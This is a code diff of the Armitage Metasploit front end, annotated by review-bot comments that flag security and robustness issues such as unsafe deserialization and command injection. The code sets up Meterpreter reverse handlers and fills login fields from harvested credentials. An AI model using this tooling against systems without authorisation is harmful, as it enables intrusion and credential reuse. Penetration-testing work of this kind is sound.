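Review bot: `-P $$PASS$$` on the last line puts the RPC password on the msfrpcd command line, where it stays readable through the process list for the daemon's lifetime, and `-S` turns SSL off for that socket, so the `-a 127.0.0.1` bind is the only thing keeping the credential exchange local; if that is the accepted trade-off for a single-user install, a `REM` line saying so would stop the next reader from "fixing" it blindly. Separately, `set JAVA_HOME="%BASE%java"` and `set MSF_DATABASE_CONFIG="%BASE%apps\pro\ui\config\database.yml"` store the surrounding quotes as part of the value (cmd.exe strips them only in the `set "NAME=value"` form), which the Ruby side may or may not tolerate, while the other `set` lines in the file use the unquoted form. Proposed: `set "JAVA_HOME=%BASE%java"` and `set "MSF_DATABASE_CONFIG=%BASE%apps\pro\ui\config\database.yml"`.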
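Review bot: `console.write` only queues `setg LPORT …` on the allocated console, and the console is released on the very next line without a `console.read`, so a failed `setg` is never observed and the global may not yet be set when `module.execute` two lines below runs. If the option hash that continues past the hunk relies on the global LPORT, the safer shape is to keep the port in a local and pass it explicitly, `$port = randomPort();` before the write and `LPORT => $port,` next to `LHOST => "0.0.0.0",`, using the same `$port` in the console command so the user's session shows the value actually in use. The `module.execute` options are cut off at the end of the hunk, so I cannot confirm whether LPORT is already listed there.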
@@ -55,7 +60,7 @@ sub setupHandlers { sub main { global('$client $mclient'); - local('%r $exception'); + local('%r $exception $lhost $temp $c'); setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L); @@ -81,8 +86,24 @@ sub main { # setup second thread. %r = call($client, "armitage.validate", $user, $pass, $null, "armitage", 120326); + # resolve lhost.. + $c = call($client, "console.allocate")['id']; + call($client, "console.write", $c, "setg LHOST\n"); + while ($lhost eq "") { + $temp = call($client, "console.read", $c)['data']; + if (["$temp" startsWith: "LHOST => "]) { + $lhost = substr(["$temp" trim], 9); + } + else { + # this shouldn't happen because having LHOST set is a precondition + # for Cortana to connect to a team server. + sleep(1000); + } + } + call($client, "console.release", $c); + # pass some objects back yo. - [$loader passObjects: $client, $mclient]; + [$loader passObjects: $client, $mclient, $lhost]; # don't make previous messages available... call($mclient, "armitage.skip"); diff --git a/external/source/armitage/scripts-cortana/internal.sl b/external/source/armitage/scripts-cortana/internal.sl index d434f920da..c83929a79c 100644 --- a/external/source/armitage/scripts-cortana/internal.sl +++ b/external/source/armitage/scripts-cortana/internal.sl @@ -9,7 +9,7 @@ import msf.*; # setg("varname", "value") sub setg { - call_async("core.setg", $1, $2); + cmd_safe("setg $1 $2"); } sub readg { @@ -335,14 +335,22 @@ sub multi_handler { } sub handler { - local('%o $3'); + local('%o $3 $key $value'); + + # default options + %o['PAYLOAD'] = $1; + %o['LPORT'] = $2; + %o['DisablePayloadHandler'] = 'false'; + %o['ExitOnSession'] = 'false'; + + # let the user override anything if ($3) { - %o = copy($3); + foreach $key => $value ($3) { + %o[$key] = $value; + } } - %o['PAYLOAD'] = "payload/ $+ $1"; - %o['LPORT'] = $2; - + # make sure LHOST is correct if ('LHOST' !in %o) { if ("*http*" iswm $1) { %o['LHOST'] = lhost(); 
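Review bot: The `while ($lhost eq "")` loop has no exit other than a reply beginning `LHOST => `, so if the console answers with anything else (an unset LHOST, whose trimmed reply `LHOST =>` is shorter than the nine characters `substr` skips and yields nothing useful, or a reply split across two `console.read` calls) the connect thread sleeps forever and the console handle is never released; the comment on the else branch already admits this assumption rather than enforcing it. Bound it and fail loudly: `while ($lhost eq "" && $tries < 30) {` with `$tries += 1;` before `sleep(1000);`, then after the loop release the console and raise a clear error if `$lhost` is still empty instead of passing an empty host to `passObjects`. `$tries` would also need adding to the `local()` list changed in the previous hunk.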
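Review bot: `cmd_safe("setg $1 $2")` interpolates the value straight into a console command line, so a value containing a newline would run as a further console command and one with quotes or leading spaces may be reparsed by the console rather than stored verbatim as `core.setg` did; since scripts pass option values through here, that is a contract change worth stating above the call: `# $2 is pasted into the console command verbatim: never pass a newline, and any quoting is the caller's job`. cmd_safe is defined outside this hunk, so whether it escapes anything itself I cannot see.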
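Review bot: `sub handler` carries no header comment, and its contract changed here in two ways a scripter would not infer from the changelog: keys in `$3` now override every default including PAYLOAD and LPORT (the removed lines forced those two after the copy), and `$1` is no longer prefixed with `payload/`. A one-line header above `sub handler {` would close that gap: `# handler($payload, $lport, [%options]) - start multi/handler for $payload on $lport; any key in %options (PAYLOAD and LPORT included) replaces the defaults set below`. The function continues past the end of the hunk.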
@@ -352,6 +360,7 @@ sub handler { } } + # let's do it... return launch('exploit', 'multi/handler', %o); } diff --git a/external/source/armitage/scripts/armitage.sl b/external/source/armitage/scripts/armitage.sl index 2cf69a9a97..fe2af9a9ec 100644 --- a/external/source/armitage/scripts/armitage.sl +++ b/external/source/armitage/scripts/armitage.sl @@ -59,7 +59,7 @@ sub showHost { else if ("*XP*" iswm $match || "*2003*" iswm $match || "*.NET*" iswm $match) { push(@overlay, 'resources/windowsxp.png'); } - else if ("*8*" iswm $match) { + else if ("*8*" iswm $match && "*2008*" !iswm $match) { push(@overlay, 'resources/windows8.png'); } else { @@ -139,7 +139,7 @@ sub _connectToMetasploit { $progress = [new ProgressMonitor: $null, "Connecting to $1 $+ : $+ $2", "first try... wish me luck.", 0, 100]; # keep track of whether we're connected to a local or remote Metasploit instance. This will affect what we expose. - $REMOTE = iff($1 eq "127.0.0.1", $null, 1); + $REMOTE = iff($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost", $null, 1); $flag = 10; while ($flag) { @@ -160,7 +160,7 @@ sub _connectToMetasploit { } # connecting locally? go to Metasploit directly... - if ($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost") { + if ($REMOTE is $null) { $client = [new MsgRpcImpl: $3, $4, $1, long($2), $null, $debug]; $aclient = [new RpcAsync: $client]; $mclient = $client; @@ -239,10 +239,6 @@ sub _connectToMetasploit { [$progress setNote: "Connected: ..."]; [$progress setProgress: 60]; - if (!$REMOTE && %MSF_GLOBAL['ARMITAGE_TEAM'] eq '1') { - showErrorAndQuit("Do not connect to 127.0.0.1 when\nrunning a team server."); - } - dispatchEvent(&postSetup); }, \$progress)); } diff --git a/external/source/armitage/scripts/attacks.sl b/external/source/armitage/scripts/attacks.sl index 4940fb4474..9fa13c9902 100644 --- a/external/source/armitage/scripts/attacks.sl +++ b/external/source/armitage/scripts/attacks.sl 
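Review bot: The local-address test `$1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost"` on the `$REMOTE` line of `_connectToMetasploit` now appears verbatim in `connectDialog` as well (util.sl, `@@ -416,7 +424,7 @@`), and the removed copy in the next hunk shows it was already duplicated before this change. Extract it once, e.g. `sub isLocalHost { return iff($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost", 1, $null); }`, and call it from both sites so the next alias is added in one place. With the `ARMITAGE_TEAM` guard removed in the last hunk, `$REMOTE` is now the only thing that distinguishes a local from a team-server session, so the existing comment above it would benefit from naming what is exposed differently when it is set. `_connectToMetasploit` continues outside the hunk.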
@@ -679,12 +679,20 @@ sub addFileListener { $actions["SigningCert"] = $actions["*FILE*"]; $actions["SigningKey"] = $actions["*FILE*"]; $actions["Wordlist"] = $actions["*FILE*"]; + $actions["EXE::Custom"] = $actions["*FILE*"]; + $actions["EXE::Template"] = $actions["*FILE*"]; $actions["WORDLIST"] = $actions["*FILE*"]; $actions["REXE"] = $actions["*FILE*"]; # set up an action to choose a session $actions["SESSION"] = lambda(&chooseSession); + # helpers to set credential pairs from database... yay? + $actions["USERNAME"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD"); + $actions["PASSWORD"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD"); + $actions["SMBUser"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass"); + $actions["SMBPass"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass"); + # set up an action to pop up a file chooser for different file type values. $actions["RHOST"] = { local('$title $temp'); diff --git a/external/source/armitage/scripts/gui.sl b/external/source/armitage/scripts/gui.sl index da5f974c10..7f7f155f88 100644 --- a/external/source/armitage/scripts/gui.sl +++ b/external/source/armitage/scripts/gui.sl @@ -446,7 +446,7 @@ sub quickListDialog { $button = [new JButton: $2]; [$button addActionListener: lambda({ - [$callback : [$model getSelectedValueFromColumn: $table, $lead]]; + [$callback : [$model getSelectedValueFromColumn: $table, $lead], $table, $model]; [$dialog setVisible: 0]; }, \$dialog, $callback => $5, \$model, \$table, $lead => $3[0])]; diff --git a/external/source/armitage/scripts/jobs.sl b/external/source/armitage/scripts/jobs.sl index fc30868be7..603f8ccf1b 100644 --- a/external/source/armitage/scripts/jobs.sl +++ b/external/source/armitage/scripts/jobs.sl 
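Review bot: The callback in `quickListDialog` is now invoked as `[$callback : value, $table, $model]`, which changes the contract for every caller that passes a `$5` callback, and nothing in the hunk records the new positional arguments; the new `credentialHelper` in passhash.sl depends on `$2` and `$3` being the table and model. Add a comment above the `lambda`, e.g. `# callback receives: the selected value from column $lead, the JTable, and its model`, so other callers know the extra arguments exist. `quickListDialog` starts and ends outside the hunk.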
@@ -16,47 +16,7 @@ import java.awt.event.*; import ui.*; sub manage_proxy_server { - manage_job("Auxiliary: server/socks4a", - # start server function - { - launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", $null); - }, - # description of job (for job kill function) - { - local('$host $port'); - ($host, $port) = values($2["datastore"], @("SRVHOST", "SRVPORT")); - return "SOCKS proxy is running on $host $+ : $+ $port $+ .\nWould you like to stop it?"; - } - ); - -} - -sub report_url { - find_job($name, { - if ($1 == -1) { - showError("Server not found"); - } - else { - local('$job $host $port $uripath'); - $job = call($client, "job.info", $1); - - ($host, $port) = values($job["info"]["datastore"], @("SRVHOST", "SRVPORT")); - $uripath = $job["info"]["uripath"]; - - local('$dialog $text $ok'); - $dialog = dialog("Output", 320, 240); - $text = [new JTextArea]; - [$text setText: "http:// $+ $host $+ : $+ $port $+ $uripath"]; - - $button = [new JButton: "Ok"]; - [$button addActionListener: lambda({ [$dialog setVisible: 0]; }, \$dialog)]; - - [$dialog add: [new JScrollPane: $text], [BorderLayout CENTER]]; - [$dialog add: center($button), [BorderLayout SOUTH]]; - - [$dialog setVisible: 1]; - } - }); + launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", 1); } sub find_job { @@ -80,26 +40,6 @@ sub find_job { }, $name => $1, $function => $2)); } -# manage_job(job name, { start job function }, { job dialog info }) -sub manage_job { - local('$name $startf $stopf'); - ($name, $startf, $stopf) = @_; - - find_job($name, lambda({ - if ($1 == -1) { - [$startf]; - } - else { - local('$job $confirm $foo $confirm'); - $job = call($client, "job.info", $1); - $confirm = askYesNo([$stopf : $1, $job], "Stop Job"); - if ($confirm eq "0") { - call_async($client, "job.stop", $1); - } - } - }, \$startf, \$stopf)); -} - sub generatePayload { local('$file'); $file = saveFile2(); 
@@ -450,6 +390,11 @@ sub _launch_dialog { elog("launched DNS enum for $domain"); } } + else if ($type eq "auxiliary" && $command eq "server/socks4a") { + local('$host $port'); + ($host, $port) = values($options, @('SRVHOST', 'SRVPORT')); + elog("started SOCKS proxy server at $host $+ : $+ $port"); + } launch_service($title, "$type $+ / $+ $command", $options, $type, $format => [$combo getSelectedItem]); } diff --git a/external/source/armitage/scripts/menus.sl b/external/source/armitage/scripts/menus.sl index 7c70ba2d62..59cd3c5143 100644 --- a/external/source/armitage/scripts/menus.sl +++ b/external/source/armitage/scripts/menus.sl @@ -54,6 +54,29 @@ sub host_selected_items { item($i, '3. Vista/7', '3', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "Vista")); item($i, '4. 8/RT', '4', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "8")); + item($h, "Set Label...", 'S', lambda({ + # calculate preexisting label to prompt with + local('$label %l $host'); + + # get a label + foreach $host ($hosts) { + if ($label eq "") { + $label = getHostLabel($host); + } + } + + # ask for a label + $label = ask("Set label to:", $label); + if ($label !is $null) { + foreach $host ($hosts) { + %l[$host] = ["$label" trim]; + } + call_async($mclient, "db.report_labels", %l); + } + }, $hosts => $2)); + + separator($h); + item($h, "Remove Host", 'R', clearHostFunction($2)); } diff --git a/external/source/armitage/scripts/passhash.sl b/external/source/armitage/scripts/passhash.sl index 19feb846c3..ad9f68ce6a 100644 --- a/external/source/armitage/scripts/passhash.sl +++ b/external/source/armitage/scripts/passhash.sl 
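Review bot: In the "Set Label..." action the loop that seeds the prompt keeps iterating after a label has been found, and the meaning of an empty answer is not stated anywhere on the client side: `mergeLabels` in DatabaseImpl removes the entry when the value is `""`, so clearing the field deletes the label for every selected host. Add `break;` after `$label = getHostLabel($host);` and a comment on the `call_async` line such as `# an empty label removes the label server-side (see db.report_labels)`. It is also worth saying in that comment that labels are shared state any connected team member may rewrite, which the changelog presents as intended but the client code does not make obvious.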
@@ -372,3 +372,34 @@ sub launchBruteForce { [$console start]; }, $type => $1, $module => $2, $options => $3, $title => $4)); } + +sub credentialHelper { + thread(lambda({ + [Thread yield]; + + # gather our credentials please + local('$creds $cred @creds'); + $creds = call($mclient, "db.creds2", [new HashMap])["creds2"]; + foreach $cred ($creds) { + if ($PASS eq "SMBPass" || $cred['ptype'] ne "smb_hash") { + push(@creds, $cred); + } + } + + # pop up a dialog to let the user choose their favorite set + quickListDialog("Choose credentials", "Select", @("user", "user", "pass", "host"), @creds, $width => 640, $height => 240, lambda({ + if ($1 eq "") { + return; + } + + local('$user $pass'); + $user = [$3 getSelectedValueFromColumn: $2, 'user']; + $pass = [$3 getSelectedValueFromColumn: $2, 'pass']; + + [$model setValueForKey: $USER, "Value", $user]; + [$model setValueForKey: $PASS, "Value", $pass]; + [$model fireListeners]; + }, \$callback, \$model, \$USER, \$PASS)); + }, \$USER, \$PASS, \$model, $callback => $4)); +} + diff --git a/external/source/armitage/scripts/server.sl b/external/source/armitage/scripts/server.sl index 78f9738dbb..1ea04e9671 100644 --- a/external/source/armitage/scripts/server.sl +++ b/external/source/armitage/scripts/server.sl @@ -403,9 +403,6 @@ sub main { # we need this global to be set so our reverse listeners work as expected. $MY_ADDRESS = $host; - # make sure clients know a team server is present. can't happen async. - call($client, "core.setg", "ARMITAGE_TEAM", '1'); - # # setup the client cache # diff --git a/external/source/armitage/scripts/targets.sl b/external/source/armitage/scripts/targets.sl index 7929dac696..3721006ea7 100644 --- a/external/source/armitage/scripts/targets.sl +++ b/external/source/armitage/scripts/targets.sl 
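Review bot: `credentialHelper` captures `\$callback` (bound to `$4`) in both lambdas but never invokes it, so whatever a caller supplies as the fourth argument is silently dropped; either call it after `[$model fireListeners]` or remove the capture and the `$callback => $4` binding so the signature does not suggest a hook that does not exist. The selection lambda also relies on `$2` and `$3` being the table and model, which is only true because of the matching `quickListDialog` change in gui.sl; a comment such as `# $1 = selected user, $2 = table, $3 = model (quickListDialog contract)` would make that coupling visible. I cannot tell from here whether `quickListDialog` builds Swing components, in which case calling it from the worker started by `thread(...)` rather than the event thread should be checked.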
@@ -21,6 +21,10 @@ sub getHostOS { return iff($1 in %hosts, %hosts[$1]['os_name'], $null); } +sub getHostLabel { + return iff($1 in %hosts, %hosts[$1]['label'], $null); +} + sub getSessions { return iff($1 in %hosts && 'sessions' in %hosts[$1], %hosts[$1]['sessions']); } @@ -122,7 +126,7 @@ on sessions { } if ($host['show'] eq "1") { - push(@nodes, @($id, describeHost($host), showHost($host), $tooltip)); + push(@nodes, @($id, $host['label'] . "", describeHost($host), showHost($host), $tooltip)); } } @@ -130,14 +134,14 @@ on sessions { } sub refreshGraph { - local('$node $id $description $icons $tooltip $highlight'); + local('$node $id $label $description $icons $tooltip $highlight'); # update everything... [$graph start]; # do the hosts? foreach $node (@nodes) { - ($id, $description, $icons, $tooltip) = $node; - [$graph addNode: $id, $description, $icons, $tooltip]; + ($id, $label, $description, $icons, $tooltip) = $node; + [$graph addNode: $id, $label, $description, $icons, $tooltip]; } # update the routes diff --git a/external/source/armitage/scripts/util.sl b/external/source/armitage/scripts/util.sl index ceed745950..de80e1d8d3 100644 --- a/external/source/armitage/scripts/util.sl +++ b/external/source/armitage/scripts/util.sl @@ -159,12 +159,15 @@ sub setg { } sub createDefaultHandler { - warn("Creating a default reverse handler..."); # setup a handler for meterpreter - setg("LPORT", randomPort()); + local('$port'); + $port = randomPort(); + setg("LPORT", $port); + warn("Creating a default reverse handler... 0.0.0.0: $+ $port"); call_async($client, "module.execute", "exploit", "multi/handler", %( PAYLOAD => "windows/meterpreter/reverse_tcp", LHOST => "0.0.0.0", + LPORT => $port, ExitOnSession => "false" )); } 
@@ -307,7 +310,12 @@ sub startMetasploit { savePreferences(); } - $handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null]; + if ("*apps*pro*" iswm $msfdir) { + $handle = [SleepUtils getIOHandle: resource("resources/msfrpcd_new.bat"), $null]; + } + else { + $handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null]; + } $data = join("\r\n", readAll($handle, -1)); closef($handle); @@ -416,7 +424,7 @@ sub connectDialog { [$dialog setVisible: 0]; connectToMetasploit($h, $p, $u, $s); - if ($h eq "127.0.0.1" || $h eq "localhost") { + if ($h eq "127.0.0.1" || $h eq "::1" || $h eq "localhost") { try { closef(connect("127.0.0.1", $p, 1000)); } diff --git a/external/source/armitage/scripts/workspaces.sl b/external/source/armitage/scripts/workspaces.sl index 90c1210b50..5a45900654 100644 --- a/external/source/armitage/scripts/workspaces.sl +++ b/external/source/armitage/scripts/workspaces.sl @@ -33,7 +33,7 @@ sub listWorkspaces { $dialog = [new JPanel]; [$dialog setLayout: [new BorderLayout]]; - ($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "session"), @()); + ($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "labels", "session"), @()); updateWorkspaceList($table, $model); [$table setSelectionMode: [ListSelectionModel MULTIPLE_INTERVAL_SELECTION]]; 
@@ -88,15 +88,16 @@ sub workspaceDialog { local('$table $model'); ($table, $model) = $2; - local('$dialog $name $host $ports $os $button $session'); + local('$dialog $name $host $ports $os $button $session $label'); $dialog = dialog($title, 640, 480); - [$dialog setLayout: [new GridLayout: 6, 1]]; + [$dialog setLayout: [new GridLayout: 7, 1]]; $name = [new ATextField: $1['name'], 16]; [$name setEnabled: $enable]; $host = [new ATextField: $1['hosts'], 16]; $ports = [new ATextField: $1['ports'], 16]; $os = [new ATextField: $1['os'], 16]; + $label = [new ATextField: $1['labels'], 16]; $session = [new JCheckBox: "Hosts with sessions only"]; if ($1['session'] eq 1) { [$session setSelected: 1]; @@ -108,6 +109,7 @@ sub workspaceDialog { [$dialog add: label_for("Hosts:", 60, $host)]; [$dialog add: label_for("Ports:", 60, $ports)]; [$dialog add: label_for("OS:", 60, $os)]; + [$dialog add: label_for("Labels:", 60, $label)]; [$dialog add: $session]; [$dialog add: center($button)]; @@ -116,15 +118,16 @@ sub workspaceDialog { [$button addActionListener: lambda({ # yay, we have a dialog... - local('$n $h $p $o $s @workspaces $ws $temp'); + local('$n $h $p $o $s $l @workspaces $ws $temp'); $n = [[$name getText] trim]; $h = [strrep([$host getText], '*', '%', '?', '_') trim]; $p = [[$ports getText] trim]; $o = [strrep([$os getText], '*', '%', '?', '_') trim]; + $l = [[$label getText] trim]; $s = [$session isSelected]; # save the new menu - $ws = workspace($n, $h, $p, $o, $s); + $ws = workspace($n, $h, $p, $o, $s, $l); @workspaces = workspaces(); foreach $temp (@workspaces) { if ($temp["name"] eq $n) { @@ -140,7 +143,7 @@ sub workspaceDialog { updateWorkspaceList($table, $model); [$dialog setVisible: 0]; - }, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model)]; + }, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model, \$label)]; } sub reset_workspace { 
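Review bot: `$l = [[$label getText] trim];` goes into `workspace(...)` with no check for the `@@` and `!!` separators that `workspaces()` uses to parse the saved `armitage.workspaces.menus` preference (next hunk, `split('@@', $workspace)`), so a label filter containing either string shifts every field of that entry and of the ones after it. The other text fields share this weakness already, but this is the field being added; `$l = strrep([[$label getText] trim], '@@', '', '!!', '');` keeps the entry parseable, and the same treatment would suit `$n`, `$h` and `$o`. The listener and `workspaceDialog` continue outside the hunk.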
@@ -199,16 +202,16 @@ sub set_workspace { } sub workspace { - return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5); + return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5, labels => $6); } sub workspaces { - local('$ws @r $name $host $port $os $session $workspace'); + local('$ws @r $name $host $port $os $session $workspace $label'); $ws = split("!!", [$preferences getProperty: "armitage.workspaces.menus", ""]); foreach $workspace ($ws) { if ($workspace ne "") { - ($name, $host, $port, $os, $session) = split('@@', $workspace); - push(@r, workspace($name, $host, $port, $os, $session)); + ($name, $host, $port, $os, $session, $label) = split('@@', $workspace); + push(@r, workspace($name, $host, $port, $os, $session, $label)); } } return @r; diff --git a/external/source/armitage/src/armitage/ArmitageApplication.java b/external/source/armitage/src/armitage/ArmitageApplication.java index aec7602dd0..b7365e1309 100644 --- a/external/source/armitage/src/armitage/ArmitageApplication.java +++ b/external/source/armitage/src/armitage/ArmitageApplication.java @@ -196,6 +196,7 @@ public class ArmitageApplication extends JFrame { r.setLayout(new BorderLayout()); r.add(t.component, BorderLayout.CENTER); r.pack(); + t.component.validate(); r.addWindowListener(new WindowAdapter() { public void windowClosing(WindowEvent ev) { diff --git a/external/source/armitage/src/cortana/Loader.java b/external/source/armitage/src/cortana/Loader.java index a0a8a8c3c0..d5c76d836d 100644 --- a/external/source/armitage/src/cortana/Loader.java +++ b/external/source/armitage/src/cortana/Loader.java @@ -15,7 +15,7 @@ public class Loader implements Loadable { protected ScriptLoader loader; protected Hashtable shared = new Hashtable(); protected ScriptVariables vars = new ScriptVariables(); - protected Object[] passMe = new Object[2]; + protected Object[] passMe = new Object[3]; protected List scripts = new LinkedList(); public void unsetDebugLevel(int flag) { 
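Review bot: `($name, $host, $port, $os, $session, $label) = split('@@', $workspace);` has no sixth element for entries saved before this change, so `$label` is left unassigned (presumably `$null`) and `workspace()` builds `labels => $null` for every pre-existing dynamic workspace. Whether a null survives the RPC layer is not visible here, but on the Java side `values.get("labels") + ""` would turn it into the string `"null"` and filter hosts by that label; normalise it when reading the preference, `if ($label is $null) { $label = ""; }` before the `push`.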
@@ -51,10 +51,11 @@ public class Loader implements Loadable { } } - public void passObjects(Object o, Object p) { + public void passObjects(Object o, Object p, Object q) { synchronized (this) { passMe[0] = o; passMe[1] = p; + passMe[2] = q; } } diff --git a/external/source/armitage/src/cortana/Main.java b/external/source/armitage/src/cortana/Main.java index be70944f5d..be04c511a3 100644 --- a/external/source/armitage/src/cortana/Main.java +++ b/external/source/armitage/src/cortana/Main.java @@ -69,7 +69,7 @@ public class Main implements Runnable, CortanaPipe.CortanaPipeListener { try { Object conns[] = setupConnections(host, port, user, pass, nick); //new MsgRpcImpl(user, pass, host, Integer.parseInt(port), true, false); - engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, host); + engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, (String)conns[2]); new Thread(this).start(); } catch (java.lang.RuntimeException rex) { diff --git a/external/source/armitage/src/graph/NetworkGraph.java b/external/source/armitage/src/graph/NetworkGraph.java index fa9b0e7eef..d15d67b3ac 100644 --- a/external/source/armitage/src/graph/NetworkGraph.java +++ b/external/source/armitage/src/graph/NetworkGraph.java 
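Review bot: `(String)conns[2]` replaces the `host` the user supplied as Cortana's address, but `passMe[2]` is only filled when the script side reaches `passObjects` with a third argument, so a script path that never gets there (or an older cortanadb.sl) now hands `null` to `Cortana` where a usable host string was previously guaranteed. Keep the old value as the fallback: `String lhost = conns[2] != null ? conns[2].toString() : host;` and pass `lhost` to the constructor. `setupConnections`, which presumably reads `passMe`, is outside the hunk and would be the place for a one-line comment on what index 2 holds.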
@@ -453,17 +453,26 @@ public class NetworkGraph extends JComponent implements ActionListener { protected Map tooltips = new HashMap(); - public Object addNode(String id, String label, Image image, String tooltip) { + public Object addNode(String id, String label, String description, Image image, String tooltip) { nodeImages.put(id, image); + if (label.length() > 0) { + if (description.length() > 0) { + description += "\n" + label; + } + else { + description = label; + } + } + mxCell cell; if (!nodes.containsKey(id)) { - cell = (mxCell)graph.insertVertex(parent, id, label, 0, 0, 125, 97); + cell = (mxCell)graph.insertVertex(parent, id, description, 0, 0, 125, 97); nodes.put(id, cell); } else { cell = (mxCell)nodes.get(id); - cell.setValue(label); + cell.setValue(description); } nodes.touch(id); diff --git a/external/source/armitage/src/msf/DatabaseImpl.java b/external/source/armitage/src/msf/DatabaseImpl.java index ba7b330d59..ff00d4d877 100644 --- a/external/source/armitage/src/msf/DatabaseImpl.java +++ b/external/source/armitage/src/msf/DatabaseImpl.java @@ -14,11 +14,15 @@ public class DatabaseImpl implements RpcConnection { protected String workspaceid = "0"; protected String hFilter = null; protected String sFilter = null; + protected String[] lFilter = null; protected Route[] rFilter = null; protected String[] oFilter = null; protected int hindex = 0; protected int sindex = 0; + /* keep track of labels associated with each host */ + protected Map labels = new HashMap(); + /* define the maximum hosts in a workspace */ protected int maxhosts = 512; 
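Review bot: `label.length()` and `description.length()` in the new `addNode` dereference both parameters without a null check, and `NetworkTable.addNode` (`@@ -252,16 +253,17 @@`) has the mirror problem: it guards `id` and `label` but calls `description.indexOf(id)` on the new, unchecked `description` argument. The Sleep caller in targets.sl coerces the label with `. ""`, but both methods are public and the two implementations should agree on the contract, e.g. `if (id == null) return null; if (label == null) label = ""; if (description == null) description = "";` at the top of each, followed by the existing logic. The rest of `addNode` continues outside the hunk.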
@@ -135,6 +139,20 @@ public class DatabaseImpl implements RpcConnection { return false; } + private boolean checkLabel(String host) { + if (!labels.containsKey(host)) + return false; + + String label_l = (labels.get(host) + "").toLowerCase(); + + for (int x = 0; x < lFilter.length; x++) { + if (label_l.indexOf(lFilter[x]) != -1) { + return true; + } + } + return false; + } + private boolean checkOS(String os) { String os_l = os.toLowerCase(); 
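Review bot: `label_l.indexOf(lFilter[x]) != -1` in `checkLabel` is true for every labelled host whenever an element of `lFilter` is the empty string, which `split(",\\s*")` yields for a leading comma or a `, ,` in the workspace's label field, so such a filter silently matches everything instead of nothing. Skip empty terms with `if (lFilter[x].length() == 0) continue;`, or drop them where `lFilter` is built in `execute` (`@@ -385,6 +487,11 @@`). A one-line comment on the method, `/* true when any filter term is a case-insensitive substring of the host's label */`, would also record that the match is substring rather than exact.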
@@ -145,11 +163,76 @@ public class DatabaseImpl implements RpcConnection { return false; } + protected void loadLabels() { + try { + /* query database for label data */ + List rows = executeQuery("SELECT DISTINCT data FROM notes WHERE ntype = 'armitage.labels'"); + if (rows.size() == 0) + return; + + /* extract our BASE64 encoded data */ + String data = ((Map)rows.get(0)).get("data") + ""; + System.err.println("Read: " + data.length() + " bytes"); + + /* turn our data into raw data */ + byte[] raw = Base64.decode(data); + + /* deserialize our notes data */ + ByteArrayInputStream store = new ByteArrayInputStream(raw); + ObjectInputStream handle = new ObjectInputStream(store); + Map temp = (Map)(handle.readObject()); + handle.close(); + store.close(); + + /* merge with our new map */ + labels.putAll(temp); + } + catch (Exception ex) { + ex.printStackTrace(); + } + } + + protected void mergeLabels(Map l) { + /* accept any label values and merge them into our global data set */ + Iterator i = l.entrySet().iterator(); + while (i.hasNext()) { + Map.Entry entry = (Map.Entry)i.next(); + if ("".equals(entry.getValue())) { + labels.remove(entry.getKey() + ""); + } + else { + labels.put(entry.getKey() + "", entry.getValue() + ""); + } + } + } + + /* add labels to our hosts */ + public List addLabels(List rows) { + if (labels.size() == 0) + return rows; + + Iterator i = rows.iterator(); + while (i.hasNext()) { + Map entry = (Map)i.next(); + String address = (entry.containsKey("address") ? 
entry.get("address") : entry.get("host")) + ""; + if (labels.containsKey(address)) { + entry.put("label", labels.get(address) + ""); + } + else { + entry.put("label", ""); + } + } + + return rows; + } + public List filterByRoute(List rows, int max) { - if (rFilter != null || oFilter != null) { + if (rFilter != null || oFilter != null || lFilter != null) { Iterator i = rows.iterator(); while (i.hasNext()) { Map entry = (Map)i.next(); + + /* make sure the address is within a route we care about */ if (rFilter != null && entry.containsKey("address")) { if (!checkRoute(entry.get("address") + "")) { i.remove(); @@ -163,9 +246,26 @@ public class DatabaseImpl implements RpcConnection { } } + /* make sure the host is something we care about too */ if (oFilter != null && entry.containsKey("os_name")) { - if (!checkOS(entry.get("os_name") + "")) + if (!checkOS(entry.get("os_name") + "")) { i.remove(); + continue; + } + } + + /* make sure the host has the right label */ + if (lFilter != null && entry.containsKey("address")) { + if (!checkLabel(entry.get("address") + "")) { + i.remove(); + continue; + } + } + else if (lFilter != null && entry.containsKey("host")) { + if (!checkLabel(entry.get("host") + "")) { + i.remove(); + continue; + } } } @@ -180,6 +280,7 @@ public class DatabaseImpl implements RpcConnection { public void connect(String dbstring, String user, String password) throws Exception { db = DriverManager.getConnection(dbstring, user, password); setWorkspace("default"); + loadLabels(); } public Object execute(String methodName) throws IOException { 
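Review bot: `loadLabels` feeds a blob read from the shared `notes` table straight into `ObjectInputStream.readObject()`, so whoever can write a row with `ntype = 'armitage.labels'` — at minimum every client and team server sharing the database credentials — chooses what gets deserialized in every Armitage instance that later connects, which is far more than the string map the feature needs. Since `db.report_labels` only ever serializes the `labels` HashMap, restrict deserialization to that shape by overriding `resolveClass` as below, or switch both sides to a text encoding (for example `java.util.Properties`) and drop Java serialization altogether. The `System.err.println("Read: ...")` line looks like a leftover debug print, and only `rows.get(0)` is consulted although `SELECT DISTINCT` can return several rows once more than one writer has stored labels. `InvalidClassException` and `ObjectStreamClass` are both in `java.io`, which the file already uses.
```java
/* the stored blob is only ever the labels HashMap; refuse any other class */
ObjectInputStream handle = new ObjectInputStream(store) {
	protected Class resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
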